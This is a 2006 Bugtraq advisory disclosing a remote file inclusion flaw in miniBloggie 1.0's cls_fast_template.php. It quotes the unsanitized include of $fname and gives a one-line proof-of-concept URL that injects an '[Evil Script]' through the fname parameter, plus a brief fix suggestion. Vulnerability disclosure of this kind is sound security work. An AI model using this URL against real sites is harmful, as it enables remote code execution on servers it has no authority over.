Bugtraq mailing list archives
miniBloggie <= 1.0 (fname) Remote File Inclusion Vulnerability
From: sh3ll () sh3ll ir
Date: 10 Aug 2006 20:38:38 -0000
--------------------------------------------------------------------------------------- miniBloggie 1.0 fname Remote File Inclusion --------------------------------------------------------------------------------------- Author : Sh3ll Date : 2006/05/01 HomePage : http://www.sh3ll.ir Contact : sh3ll[at]sh3ll[dot]ir --------------------------------------------------------------------------------------- Affected Software Description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : miniBloggie version : 1.0 Venedor : http://www.mywebland.com Class : Remote File Inclusion Risk : High Summary : minibloggie, a mini blog script yet effective built using fast template for easy customisation. Using Mysql database system with edit, delete, , support smiley & BBcode, adminstrator log in for easy website management. --------------------------------------------------------------------------------------- Vulnerability: ~~~~~~~~~~~~~ The Problem Exists Is in The cls_fast_template.php When Used The Variable in a $fname include() Function Without Being Declared. ---------------------------------cls_fast_template.php--------------------------------- .... <?php else { fclose($fp); include $fname; return; } ... --------------------------------------------------------------------------------------- PoC: ~~~ http://www.target.com/[miniBloggie]/cls_fast_template.php?fname=[Evil Script] Solution: ~~~~~~~~ Sanitize Variabel $fname in cls_fast_template.php ---------------------------------------------------------------------------------------- Note: ~~~~ Venedor Contacted, But No Response. So Do a Dirty Patch. ---------------------------------------------------------------------------------------- Shoutz: ~~~~~~ ~ Special Greetz to My Best Friend N4sh3n4s & My GF Atena ~ To All My Friends in Xmors - Aria - Hackerz & Other Iranian Cyber Teams
Current thread:
- miniBloggie <= 1.0 (fname) Remote File Inclusion Vulnerability sh3ll (Aug 11)
- Re: miniBloggie <= 1.0 (fname) Remote File Inclusion Vulnerability Carsten Eilers (Aug 14)